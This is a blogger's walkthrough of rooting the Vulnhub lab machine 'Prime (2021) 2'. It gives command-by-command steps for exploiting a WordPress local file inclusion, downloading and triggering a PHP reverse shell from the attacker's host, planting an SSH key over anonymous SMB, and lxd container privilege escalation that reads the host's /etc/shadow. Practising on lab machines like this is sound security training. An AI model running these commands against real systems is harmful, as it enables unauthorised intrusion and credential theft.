This post, Prime (2021) 2: Walkthrough – Vulnhub – Writeup will describe the steps that I performed to root the machine by Suraj. However, I have to say that the machine didn’t work on my virtual box but VMWare.
Link to the machine: https://www.vulnhub.com/entry/prime-2021-2,696/
Check the harry potter series as well.
Firstly, I identified the target and open ports using netdiscover and nmap.
sudo netdiscover -i eth0 -r 192.168.19.0/24
nmap -T4 -sC -sV -p- --min-rate=1000 192.168.19.135
Here, in python server, we can browse the home directory of a user whereas on apache server, there is just a simple website. Now, I can view the contents of one server and do the directory enumeration on another.
View the contents
From the screenshot above, we can say that the directory we were browsing belongs to jarvis. Likewise, there is a PHP file that allows executing shell commands using GET parameter ‘cmd’. Hence, we can anticipate that there might be a local file inclusion vulnerability on the apache server.
Thus, I did directory enumeration in the apache server.
gobuster dir -u http://192.168.19.135 -x html,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
I found an installation of wordpress on the path /wp.
Now that I know the website is running wordpress, I can enumerate it using wpscan.
# replace WPSCAN_KEY with your api token of WPSCAN
wpscan --api-token $WPSCAN_KEY --url http://192.168.19.135/wp --detection-mode aggressive -e
Finally, I confirmed that there is a LFI vulnerability in one of the used plugins. Subsequently, I visited the links from the reference for the proof of concept.
Local File Inclusion
The vulnerability works and I can run the shell.php that we saw earlier in the python server. Now, on firefox, I view tried executing the commands.
Although the target has nc installed, I couldn’t get reverse shell from there. So, I decided to copy the webshell to the target and invoke it.
On local machine:
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
python3 -m http.server
I listened on the port for the reverse shell whereas I downloaded my shell.php to the /tmp directory.
# On local machine:
nc -nlvp 4444
# On firefox, replace the cmd parameter's value as
wget http://192.168.19.132:8000/shell.php -O /tmp/shell.php # that's my IP
Then, I invoked the shell using the same vulnerability.
Finally, I got the reverse shell. Now, we have to find the user’s credentials and switch to his home directory.
Getting user’s access
I have to give you a sad news now. Although, we got reverse shell, it was all a rabbit hole. I discovered this after using tools like linpeas.sh and LinEnum.sh. However, I looked the smb configuration file to see if it allows anonymous access.
Now, we can list the shares by the following commands.
smbclient -N -L \\\\192.168.19.135\\
smbclient -N \\\\192.168.19.135\\welcome
Now, I will see if I have write access on the disk.
It looks like, we can write on the home directory of the user jarves. Therefore, I will add my own ssh public key into authorized_keys of jarves.
Add public key
Now, I can add my public key to a file in the local machine and copy that file using smbclient.
echo __your_public_key__ > authorized_keys
On smbclient, the sytax to download the file to remote machine is as follows:
put local_file remote_file
Finally, I can login using ssh.
ssh email@example.com -i ~/.ssh/id_rsa
Finally, I can now work on privilege escalation part. When I looked into the id, I saw that the user belongs to a group lxd.
https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation. This link provides the details on the escalation. I used method 1 for this.
# Install dependencies
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
go get -d -v github.com/lxc/distrobuilder
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
#Create the container
sudo /home/kali/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
python3 -m http.server
On the target machine:
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image
lxc init alpine privesc -c security.privileged=true
lxc list #List containers
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
This is the root of the current container. To find the container of the host machine, we have to change directory to /mnt/root.
cat etc/shadow # we can view the shadow file of the host
This machine gave me a mixed feeling. When I started doing this machine, I thought it’s quite easy because everything was going well. However, I forgot to check if anonymous access to the SMB server is allowed or not. Therefore, we should never overlook any information that is available to us. If I had checked the SMB client before diving deeper, I would have saved a lot of time of mine and yours. See you in the next post.